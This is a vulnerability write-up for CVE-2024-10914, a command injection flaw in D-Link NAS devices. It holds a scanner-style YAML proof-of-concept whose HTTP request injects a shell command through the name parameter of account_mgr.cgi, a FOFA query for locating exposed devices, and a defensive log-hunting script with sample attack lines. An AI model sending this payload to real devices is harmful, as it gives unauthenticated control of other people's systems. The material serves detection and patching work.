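Vulnerability description
A command injection vulnerability exists in the /cgi-bin/account_mgr.cgi interface of D-Link NAS devices. An unauthenticated attacker can exploit it with a specially crafted HTTP request to execute arbitrary system commands, write backdoor files, and gain control of the server.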
fofa: app="D_Link-DNS-ShareCenter"
id: CVE-2024-10914

info:
  name: D-Link NAS account_mgr.cgi存在远程命令执行
  author: zan8in
  severity: critical
  verified: true
  description: |-
    D-Link NAS设备的/cgi-bin/account_mgr.cgi接口处存在命令注入漏洞,未经身份验证的攻击者通过特制的HTTP请求可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。
    fofa: app="D_Link-DNS-ShareCenter"
  affected: |-
    DNS-320 1.00
    DNS-320LW 1.01.0914.2012
    DNS-325 1.01
    DNS-325 1.02
    DNS-340L 1.08
  reference:
    - https://mp.weixin.qq.com/s/UILrkEAsD1CYlqEhbH9QZQ
  tags: dlink,cve,cve2024,rce,nas
  created: 2024/11/18

set:
  hostname: request.url.host
  command: "ifconfig"
rules:
  r0:
    request:
      raw: |-
        GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
    expression: |
      response.status == 200 && response.body.bcontains(b'inet addr:') && response.body.ibcontains(b'Mask:') && response.body.bcontains(b"Content-type: text/html")
expression: r0()
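
For defenders, the request shape above (cmd=cgi_user_add with shell metacharacters in name) can be hunted in web or reverse-proxy access logs. The following is an added example, not part of the original PoC: it assumes combined-format log lines, and the account-name allowlist and the sample log entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[0-9.]+"')
# Characters a legitimate account name is assumed to need; anything else is flagged.
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9_.-]*")
TARGET_PATH = "/cgi-bin/account_mgr.cgi"


def suspicious_name(uri):
    """Return the decoded name value if the URI fits the CVE-2024-10914 pattern, else None."""
    parts = urlsplit(uri)
    if parts.path != TARGET_PATH:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if "cgi_user_add" not in query.get("cmd", []):
        return None
    for name in query.get("name", []):
        # Quotes, semicolons, backticks, spaces etc. never belong in an account name.
        if not SAFE_NAME_RE.fullmatch(name):
            return name
    return None


def scan(lines):
    """Return a list of (source_ip, decoded_name) for each matching log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        name = suspicious_name(m.group("uri"))
        if name is not None:
            hits.append((line.split(" ", 1)[0], name))
    return hits


# Constructed sample log lines (documentation IP ranges), not taken from a real device.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Nov/2024:10:00:01 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ifconfig;%27 HTTP/1.1" 200 512',
    '192.0.2.11 - - [18/Nov/2024:10:00:05 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=backup_user HTTP/1.1" 200 87',
    '198.51.100.7 - - [18/Nov/2024:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for ip, name in scan(SAMPLE_LOG):
        print(f"possible CVE-2024-10914 attempt from {ip}: name={name!r}")
```

Any hit from an unauthenticated source against one of the affected models listed above is worth treating as a compromise lead, since the PoC's match condition shows command output is returned in the response body.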